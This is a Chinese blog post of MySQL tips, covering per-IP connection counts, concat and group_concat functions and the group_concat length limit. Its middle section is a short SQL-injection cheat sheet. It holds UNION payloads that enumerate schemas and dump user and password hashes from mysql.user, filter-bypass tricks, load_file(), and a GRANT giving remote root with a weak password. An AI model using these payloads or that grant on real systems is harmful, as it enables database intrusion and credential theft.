MySQL的一些tips总结_3

本文最后更新于2015年4月26日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢!

=Start=

查看MySQL上每个IP的连接个数

要统计数据库的连接数,我们通常情况下是统计总数,没有细分到每个IP上。现在要监控每个IP的连接数,实现方式如下:

mysql> select SUBSTRING_INDEX(host,':',1) as ip, count(*) from information_schema.processlist group by ip;

# /usr/local/bin/mysql -uroot -h127.0.0.1 -e"show processlist;" | awk -F: 'NR>1 {print $2}' | sort | uniq -c
# /usr/local/bin/mysql -uroot -h127.0.0.1 --skip-column-names -e"show processlist;" | awk '{print $3}' | awk -F":" '{print $1}' | sort | uniq -c
# --skip-column-names    不显示数据列的名字

==

这里主要想记录的是MySQL的concat、concat_ws和group_concat函数,顺带翻出来了一些之前看到的较好的MySQL注入方面的文章。

搜索关键字:
  • mysql concat null
  • mysql ifnull
  • mysql concat concat_ws group_concat
  • mysql load_file
  • mysql limit offset performance optimization
  • mysql information_schema
参考链接:
==MySQL统计函数GROUP_CONCAT陷阱==

最近在用MySQL做一些数据的预处理,经常会用到group_concat函数,比如类似下面一条语句

mysql>select aid,group_concat(bid) from tbl group by aid limit 1;

sql语句比较简单,按照aid分组,并且把相应的bid用逗号串起来。这样的句子大家可能都用过,也可能不会出问题,但是如果bid非常多的话,你就要小心了,比如下面的提示信息:

Query OK, XXX rows affected, 1 warning (3 min 45.12 sec)

怎么会有警告呢,打出来看看:

mysql> show warnings;
+---------+------+--------------------------------------+
| Level   | Code | Message                                 |
+---------+------+--------------------------------------+
| Warning | 1260 | 1 line(s) were cut by GROUP_CONCAT()    |
+---------+------+--------------------------------------+

居然被GROUP_CONCAT截断了我的结果,查了一下手册,原来GROUP_CONCAT有个最大长度的限制,超过最大长度就会被截断掉,你可以通过下面的语句获得:

mysql> SELECT @@global.group_concat_max_len;
+-------------------------------+
| @@global.group_concat_max_len |
+-------------------------------+
|                      1024     |
+-------------------------------+

1024这就是一般MySQL系统默认的最大长度,如果你的bid串起来大于这个就会出问题,好在有解决的办法:

1.在MySQL配置文件中加上

group_concat_max_len = 102400 #你要的最大长度

2.可以简单一点,执行语句

mysql> SET GLOBAL group_concat_max_len=102400;
Query OK, 0 rows affected (0.01 sec)

再执行group_concat语句就不会出问题了,另外MySQL手册上还给出了group_concat的详细用法,给个示例你就明白了:

mysql>select aid,group_concat(bid order by bid separator ',') as bid_str from tbl group by aid;

还可以排序和设置分隔符,功能强大。

==

显示库基本信息
select 1,concat(user(),0x20,database(),0x20,version()),3,4--
列库
select 1,group_concat(distinct table_schema),3,4 from information_schema.columns--
列表
select 1,group_concat(distinct table_name),3,4 from information_schema.tables where table_schema=database()--
查询列
select 1,group_concat(distinct column_name),3,4 from information_schema.columns where table_schema=database()--
查询具体值
select 1,group_concat(user,0x20,password),3,4 from mysql.user--
select 1,concat(user,password),3,4 from mysql.user--


select concat(user(),0x20,ifnull(database(),'null'),0x20,version());
select concat_ws('|||',user(),database(),version());
select group_concat(user(),COALESCE(database(), 'NULL'),version());
select group_concat(user(),0x20,COALESCE(database(), 'NULL'),0x20,version());
select group_concat(user(),database(),version() SEPARATOR ',');	#separator不起作用

==

1.注释符号
# Hash 语法
/* C-style 语法
-- SQL 语法(后面需要有一个空格)
;%00 空字节
` 反引号
2.过滤空格注入
使用/**/或()或+代替空格
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
3.多条数据显示
concat()
group_concat()
concat_ws()
4.相关系统函数
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL安装路径
@@version_compile_os 操作系统
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
5.mysql一般注入语句
猜字段数:
order by n/*

=END=

声明: 除非注明,ixyzero.com文章均为原创,转载请以链接形式标明本文地址,谢谢!
https://ixyzero.com/blog/archives/2088.html

6 thoughts on “MySQL的一些tips总结_3”

  1. 修改MySQL的提示符
    `
    $ vim ~/.bashrc
    #MySQL
    export MYSQL_PS1=”u@h [d]> ”
    $ source ~/.bashrc
    `

  2. 初相识|performance_schema全方位介绍(一)
    https://mp.weixin.qq.com/s/hIMiOGTgUVg6pt6CDD1JjA
    `
    1、什么是performance_schema
    2、performance_schema使用快速入门
    2.1. 检查当前数据库版本是否支持
    2.2. 启用performance_schema
    2.3. performance_schema表的分类
    2.4. performance_schema简单配置与使用
    `

发表评论

电子邮件地址不会被公开。 必填项已用*标注